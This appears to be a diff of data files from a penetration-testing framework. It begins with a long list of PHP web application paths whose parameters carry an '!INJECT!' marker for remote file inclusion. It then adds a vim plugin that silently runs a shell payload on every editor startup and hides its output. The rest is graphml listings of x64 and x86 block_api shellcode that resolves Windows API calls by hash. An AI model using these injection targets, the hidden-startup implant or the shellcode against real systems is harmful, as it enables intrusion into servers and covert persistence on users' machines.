+/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
+/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
+/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
+/web/Flickrclient.php?path_prefix=!INJECT!
+/web/help.php?LIBSDIR=!INJECT!
+/web/includes/blogger.php?path_prefix=!INJECT!
+/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
+/web/includes/functions/html_generate.php?path_prefix=!INJECT!
+/web/includes/functions/validations.php?path_prefix=!INJECT!
+/web/index.php?LIBSDIR=!INJECT!
+/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
+/web/login.php?LIBSDIR=!INJECT!
+/web/logout.php?LIBSDIR=!INJECT!
+/web/lom.php?ETCDIR=!INJECT!
+/web/network_module_selector.php?path_prefix=!INJECT!
+/web/submit_abuse.php?path_prefix=!INJECT!
+/web/submit_comment.php?path_prefix=!INJECT!
+/webavis/class/class.php?root=!INJECT!?
+/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
+/webnews/template.php?content_page=!INJECT!?
+/webroot/css.php?CONFIGS=!INJECT!
+/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
+/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
+/window.php?action=!INJECT!
+/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
+/work/index.php?g_include=!INJECT!
+/work/module/forum/forum.php?g_include=!INJECT!
+/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
+/wp-cache-phase1.php?plugin=!INJECT!
+/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
+/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
+/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
+/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
+/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
+/wsk/wsk.php?wsk=!INJECT!
+/xarg_corner.php?xarg=!INJECT!?
+/xarg_corner_bottom.php?xarg=!INJECT!?
+/xarg_corner_top.php?xarg=!INJECT!?
+/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
+/xt_counter.php?server_base_dir=!INJECT!
+/yabbse/Sources/Packages.php?sourcedir=!INJECT!
+/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
+/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
+/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
+/zipndownload.php?PP_PATH=!INJECT!?
+/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?

data/exploits/vim_plugin/plugin.vim

@@ -0,0 +1,11 @@
+" NAME.vim - Runs in the background on startup, discards output
+ 
+if !has('job') || exists('g:loaded_ZZWcUtfrDa')
+  finish
+endif
+let g:loaded_NAME = 1
+ 
+augroup NAME
+  autocmd!
+  autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
+augroup END

data/shellcode/block_api.x64.graphml

@@ -90,350 +90,343 @@
         <node id="block.0x1017:instruction.0x101b">
           <data key="address">0x101b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">480fb74a4a</data>
-          <data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
+          <data key="instruction.hex">480fb74a48</data>
+          <data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
         </node>
         <node id="block.0x1017:instruction.0x1020">
           <data key="address">0x1020</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">4d31c9</data>
-          <data key="instruction.source">xor r9, r9</data>
+          <data key="instruction.hex">41b900000000</data>
+          <data key="instruction.source">mov r9d, 0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1023">
-      <data key="address">0x1023</data>
+    <node id="block.0x1026">
+      <data key="address">0x1026</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1023</data>
+        <data key="address">0x1026</data>
         <data key="type">block</data>
-        <node id="block.0x1023:instruction.0x1023">
-          <data key="address">0x1023</data>
+        <node id="block.0x1026:instruction.0x1026">
+          <data key="address">0x1026</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
         </node>
-        <node id="block.0x1023:instruction.0x1026">
-          <data key="address">0x1026</data>
+        <node id="block.0x1026:instruction.0x1029">
+          <data key="address">0x1029</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ac</data>
           <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
         </node>
-        <node id="block.0x1023:instruction.0x1027">
-          <data key="address">0x1027</data>
+        <node id="block.0x1026:instruction.0x102a">
+          <data key="address">0x102a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3c61</data>
           <data key="instruction.source">cmp al, 0x61</data>
         </node>
-        <node id="block.0x1023:instruction.0x1029">
-          <data key="address">0x1029</data>
+        <node id="block.0x1026:instruction.0x102c">
+          <data key="address">0x102c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7c02</data>
-          <data key="instruction.source">jl 0x102d</data>
+          <data key="instruction.source">jl 0x1030</data>
         </node>
-        <edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
-        <edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
-        <edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
+        <edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
+        <edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
+        <edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
       </graph>
     </node>
-    <node id="block.0x102b">
-      <data key="address">0x102b</data>
+    <node id="block.0x102e">
+      <data key="address">0x102e</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x102b</data>
+        <data key="address">0x102e</data>
         <data key="type">block</data>
-        <node id="block.0x102b:instruction.0x102b">
-          <data key="address">0x102b</data>
+        <node id="block.0x102e:instruction.0x102e">
+          <data key="address">0x102e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x102d">
-      <data key="address">0x102d</data>
+    <node id="block.0x1030">
+      <data key="address">0x1030</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x102d</data>
+        <data key="address">0x1030</data>
         <data key="type">block</data>
-        <node id="block.0x102d:instruction.0x102d">
-          <data key="address">0x102d</data>
+        <node id="block.0x1030:instruction.0x1030">
+          <data key="address">0x1030</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41c1c90d</data>
           <data key="instruction.source">ror r9d, 0xd</data>
         </node>
-        <node id="block.0x102d:instruction.0x1031">
-          <data key="address">0x1031</data>
+        <node id="block.0x1030:instruction.0x1034">
+          <data key="address">0x1034</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4101c1</data>
           <data key="instruction.source">add r9d, eax</data>
         </node>
-        <node id="block.0x102d:instruction.0x1034">
-          <data key="address">0x1034</data>
+        <node id="block.0x1030:instruction.0x1037">
+          <data key="address">0x1037</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e2ed</data>
-          <data key="instruction.source">loop 0x1023</data>
+          <data key="instruction.source">loop 0x1026</data>
         </node>
-        <edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
-        <edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
+        <edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
+        <edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
       </graph>
     </node>
-    <node id="block.0x1036">
-      <data key="address">0x1036</data>
+    <node id="block.0x1039">
+      <data key="address">0x1039</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1036</data>
+        <data key="address">0x1039</data>
         <data key="type">block</data>
-        <node id="block.0x1036:instruction.0x1036">
-          <data key="address">0x1036</data>
+        <node id="block.0x1039:instruction.0x1039">
+          <data key="address">0x1039</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">52</data>
           <data key="instruction.source">push rdx</data>
         </node>
-        <node id="block.0x1036:instruction.0x1037">
-          <data key="address">0x1037</data>
+        <node id="block.0x1039:instruction.0x103a">
+          <data key="address">0x103a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4151</data>
           <data key="instruction.source">push r9</data>
         </node>
-        <node id="block.0x1036:instruction.0x1039">
-          <data key="address">0x1039</data>
+        <node id="block.0x1039:instruction.0x103c">
+          <data key="address">0x103c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b5220</data>
           <data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
         </node>
-        <node id="block.0x1036:instruction.0x103d">
-          <data key="address">0x103d</data>
+        <node id="block.0x1039:instruction.0x1040">
+          <data key="address">0x1040</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b423c</data>
           <data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
         </node>
-        <node id="block.0x1036:instruction.0x1040">
-          <data key="address">0x1040</data>
+        <node id="block.0x1039:instruction.0x1043">
+          <data key="address">0x1043</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801d0</data>
           <data key="instruction.source">add rax, rdx</data>
         </node>
-        <node id="block.0x1036:instruction.0x1043">
-          <data key="address">0x1043</data>
+        <node id="block.0x1039:instruction.0x1046">
+          <data key="address">0x1046</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">668178180b02</data>
           <data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
         </node>
-        <node id="block.0x1036:instruction.0x1049">
-          <data key="address">0x1049</data>
+        <node id="block.0x1039:instruction.0x104c">
+          <data key="address">0x104c</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">7572</data>
+          <data key="instruction.hex">756f</data>
           <data key="instruction.source">jne 0x10bd</data>
         </node>
-        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
-        <edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
-        <edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
-        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
-        <edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
-        <edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
-        <edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
-        <edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
+        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
+        <edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
+        <edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
+        <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
+        <edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
+        <edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
+        <edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
+        <edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
       </graph>
     </node>
-    <node id="block.0x104b">
-      <data key="address">0x104b</data>
+    <node id="block.0x104e">
+      <data key="address">0x104e</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x104b</data>
+        <data key="address">0x104e</data>
         <data key="type">block</data>
-        <node id="block.0x104b:instruction.0x104b">
-          <data key="address">0x104b</data>
+        <node id="block.0x104e:instruction.0x104e">
+          <data key="address">0x104e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8088000000</data>
           <data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
         </node>
-        <node id="block.0x104b:instruction.0x1051">
-          <data key="address">0x1051</data>
+        <node id="block.0x104e:instruction.0x1054">
+          <data key="address">0x1054</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x104b:instruction.0x1054">
-          <data key="address">0x1054</data>
+        <node id="block.0x104e:instruction.0x1057">
+          <data key="address">0x1057</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">7467</data>
+          <data key="instruction.hex">7464</data>
           <data key="instruction.source">je 0x10bd</data>
         </node>
-        <edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
-        <edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
+        <edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
+        <edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
       </graph>
     </node>
-    <node id="block.0x1056">
-      <data key="address">0x1056</data>
+    <node id="block.0x1059">
+      <data key="address">0x1059</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1056</data>
+        <data key="address">0x1059</data>
         <data key="type">block</data>
-        <node id="block.0x1056:instruction.0x1056">
-          <data key="address">0x1056</data>
+        <node id="block.0x1059:instruction.0x1059">
+          <data key="address">0x1059</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801d0</data>
           <data key="instruction.source">add rax, rdx</data>
         </node>
-        <node id="block.0x1056:instruction.0x1059">
-          <data key="address">0x1059</data>
+        <node id="block.0x1059:instruction.0x105c">
+          <data key="address">0x105c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">50</data>
           <data key="instruction.source">push rax</data>
         </node>
-        <node id="block.0x1056:instruction.0x105a">
-          <data key="address">0x105a</data>
+        <node id="block.0x1059:instruction.0x105d">
+          <data key="address">0x105d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4818</data>
           <data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
         </node>
-        <node id="block.0x1056:instruction.0x105d">
-          <data key="address">0x105d</data>
+        <node id="block.0x1059:instruction.0x1060">
+          <data key="address">0x1060</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">448b4020</data>
           <data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
         </node>
-        <node id="block.0x1056:instruction.0x1061">
-          <data key="address">0x1061</data>
+        <node id="block.0x1059:instruction.0x1064">
+          <data key="address">0x1064</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901d0</data>
           <data key="instruction.source">add r8, rdx</data>
         </node>
-        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
-        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
-        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
-        <edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
+        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
+        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
+        <edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
+        <edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
       </graph>
     </node>
-    <node id="block.0x1064">
-      <data key="address">0x1064</data>
+    <node id="block.0x1067">
+      <data key="address">0x1067</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1064</data>
+        <data key="address">0x1067</data>
         <data key="type">block</data>
-        <node id="block.0x1064:instruction.0x1064">
-          <data key="address">0x1064</data>
+        <node id="block.0x1067:instruction.0x1067">
+          <data key="address">0x1067</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e356</data>
+          <data key="instruction.hex">e353</data>
           <data key="instruction.source">jrcxz 0x10bc</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1066">
-      <data key="address">0x1066</data>
+    <node id="block.0x1069">
+      <data key="address">0x1069</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1066</data>
+        <data key="address">0x1069</data>
         <data key="type">block</data>
-        <node id="block.0x1066:instruction.0x1066">
-          <data key="address">0x1066</data>
+        <node id="block.0x1069:instruction.0x1069">
+          <data key="address">0x1069</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc9</data>
           <data key="instruction.source">dec rcx</data>
         </node>
-        <node id="block.0x1066:instruction.0x1069">
-          <data key="address">0x1069</data>
+        <node id="block.0x1069:instruction.0x106c">
+          <data key="address">0x106c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b3488</data>
           <data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
         </node>
-        <node id="block.0x1066:instruction.0x106d">
-          <data key="address">0x106d</data>
+        <node id="block.0x1069:instruction.0x1070">
+          <data key="address">0x1070</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801d6</data>
           <data key="instruction.source">add rsi, rdx</data>
         </node>
-        <node id="block.0x1066:instruction.0x1070">
-          <data key="address">0x1070</data>
+        <node id="block.0x1069:instruction.0x1073">
+          <data key="address">0x1073</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">4d31c9</data>
-          <data key="instruction.source">xor r9, r9</data>
+          <data key="instruction.hex">448b4c2408</data>
+          <data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
         </node>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
-        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
-        <edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
+        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
+        <edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
+        <edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
       </graph>
     </node>
-    <node id="block.0x1073">
-      <data key="address">0x1073</data>
+    <node id="block.0x1078">
+      <data key="address">0x1078</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1073</data>
+        <data key="address">0x1078</data>
         <data key="type">block</data>
-        <node id="block.0x1073:instruction.0x1073">
-          <data key="address">0x1073</data>
+        <node id="block.0x1078:instruction.0x1078">
+          <data key="address">0x1078</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831c0</data>
           <data key="instruction.source">xor rax, rax</data>
         </node>
-        <node id="block.0x1073:instruction.0x1076">
-          <data key="address">0x1076</data>
+        <node id="block.0x1078:instruction.0x107b">
+          <data key="address">0x107b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ac</data>
           <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
         </node>
-        <node id="block.0x1073:instruction.0x1077">
-          <data key="address">0x1077</data>
+        <node id="block.0x1078:instruction.0x107c">
+          <data key="address">0x107c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41c1c90d</data>
           <data key="instruction.source">ror r9d, 0xd</data>
         </node>
-        <node id="block.0x1073:instruction.0x107b">
-          <data key="address">0x107b</data>
+        <node id="block.0x1078:instruction.0x1080">
+          <data key="address">0x1080</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4101c1</data>
           <data key="instruction.source">add r9d, eax</data>
         </node>
-        <node id="block.0x1073:instruction.0x107e">
-          <data key="address">0x107e</data>
+        <node id="block.0x1078:instruction.0x1083">
+          <data key="address">0x1083</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">38e0</data>
           <data key="instruction.source">cmp al, ah</data>
         </node>
-        <node id="block.0x1073:instruction.0x1080">
-          <data key="address">0x1080</data>
+        <node id="block.0x1078:instruction.0x1085">
+          <data key="address">0x1085</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">75f1</data>
-          <data key="instruction.source">jne 0x1073</data>
+          <data key="instruction.source">jne 0x1078</data>
         </node>
-        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
-        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
-        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
-        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
-        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
-        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
-        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
-        <edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
-        <edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
+        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
+        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
+        <edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
+        <edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
+        <edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
+        <edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
+        <edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
+        <edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
+        <edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
       </graph>
     </node>
-    <node id="block.0x1082">
-      <data key="address">0x1082</data>
+    <node id="block.0x1087">
+      <data key="address">0x1087</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1082</data>
+        <data key="address">0x1087</data>
         <data key="type">block</data>
-        <node id="block.0x1082:instruction.0x1082">
-          <data key="address">0x1082</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">4c034c2408</data>
-          <data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
-        </node>
-        <node id="block.0x1082:instruction.0x1087">
+        <node id="block.0x1087:instruction.0x1087">
           <data key="address">0x1087</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4539d1</data>
           <data key="instruction.source">cmp r9d, r10d</data>
         </node>
-        <node id="block.0x1082:instruction.0x108a">
+        <node id="block.0x1087:instruction.0x108a">
           <data key="address">0x108a</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">75d8</data>
-          <data key="instruction.source">jne 0x1064</data>
+          <data key="instruction.hex">75db</data>
+          <data key="instruction.source">jne 0x1067</data>
         </node>
-        <edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
-        <edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
+        <edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
       </graph>
     </node>
     <node id="block.0x108c">
@@ -640,17 +633,17 @@
       </graph>
     </node>
     <edge source="block.0x1000" target="block.0x1017"/>
-    <edge source="block.0x1017" target="block.0x1023"/>
-    <edge source="block.0x1023" target="block.0x102b"/>
-    <edge source="block.0x102b" target="block.0x102d"/>
-    <edge source="block.0x102d" target="block.0x1036"/>
-    <edge source="block.0x1036" target="block.0x104b"/>
-    <edge source="block.0x104b" target="block.0x1056"/>
-    <edge source="block.0x1056" target="block.0x1064"/>
-    <edge source="block.0x1064" target="block.0x1066"/>
-    <edge source="block.0x1066" target="block.0x1073"/>
-    <edge source="block.0x1073" target="block.0x1082"/>
-    <edge source="block.0x1082" target="block.0x108c"/>
+    <edge source="block.0x1017" target="block.0x1026"/>
+    <edge source="block.0x1026" target="block.0x102e"/>
+    <edge source="block.0x102e" target="block.0x1030"/>
+    <edge source="block.0x1030" target="block.0x1039"/>
+    <edge source="block.0x1039" target="block.0x104e"/>
+    <edge source="block.0x104e" target="block.0x1059"/>
+    <edge source="block.0x1059" target="block.0x1067"/>
+    <edge source="block.0x1067" target="block.0x1069"/>
+    <edge source="block.0x1069" target="block.0x1078"/>
+    <edge source="block.0x1078" target="block.0x1087"/>
+    <edge source="block.0x1087" target="block.0x108c"/>
     <edge source="block.0x108c" target="block.0x10bc"/>
     <edge source="block.0x10bc" target="block.0x10bd"/>
   </graph>

data/shellcode/block_api.x86.graphml

@@ -69,492 +69,471 @@
         <node id="block.0x100f:instruction.0x1012">
           <data key="address">0x1012</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">0fb74a26</data>
-          <data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
+          <data key="instruction.hex">0fb74a24</data>
+          <data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
         </node>
         <node id="block.0x100f:instruction.0x1016">
           <data key="address">0x1016</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">31ff</data>
-          <data key="instruction.source">xor edi, edi</data>
+          <data key="instruction.hex">bf00000000</data>
+          <data key="instruction.source">mov edi, 0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1018">
-      <data key="address">0x1018</data>
+    <node id="block.0x101b">
+      <data key="address">0x101b</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1018</data>
+        <data key="address">0x101b</data>
         <data key="type">block</data>
-        <node id="block.0x1018:instruction.0x1018">
-          <data key="address">0x1018</data>
+        <node id="block.0x101b:instruction.0x101b">
+          <data key="address">0x101b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
         </node>
-        <node id="block.0x1018:instruction.0x101a">
-          <data key="address">0x101a</data>
+        <node id="block.0x101b:instruction.0x101d">
+          <data key="address">0x101d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ac</data>
           <data key="instruction.source">lodsb al, byte ptr [esi]</data>
         </node>
-        <node id="block.0x1018:instruction.0x101b">
-          <data key="address">0x101b</data>
+        <node id="block.0x101b:instruction.0x101e">
+          <data key="address">0x101e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3c61</data>
           <data key="instruction.source">cmp al, 0x61</data>
         </node>
-        <node id="block.0x1018:instruction.0x101d">
-          <data key="address">0x101d</data>
+        <node id="block.0x101b:instruction.0x1020">
+          <data key="address">0x1020</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7c02</data>
-          <data key="instruction.source">jl 0x1021</data>
+          <data key="instruction.source">jl 0x1024</data>
         </node>
-        <edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
-        <edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
-        <edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
+        <edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
+        <edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
+        <edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
       </graph>
     </node>
-    <node id="block.0x101f">
-      <data key="address">0x101f</data>
+    <node id="block.0x1022">
+      <data key="address">0x1022</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x101f</data>
+        <data key="address">0x1022</data>
         <data key="type">block</data>
-        <node id="block.0x101f:instruction.0x101f">
-          <data key="address">0x101f</data>
+        <node id="block.0x1022:instruction.0x1022">
+          <data key="address">0x1022</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">2c20</data>
           <data key="instruction.source">sub al, 0x20</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1021">
-      <data key="address">0x1021</data>
+    <node id="block.0x1024">
+      <data key="address">0x1024</data>
       <data key="type">block</data>
       <graph edgedefault="directed">
-        <data key="address">0x1021</data>
+        <data key="address">0x1024</data>
         <data key="type">block</data>
-        <node id="block.0x1021:instruction.0x1021">
-          <data key="address">0x1021</data>
+        <node id="block.0x1024:instruction.0x1024">
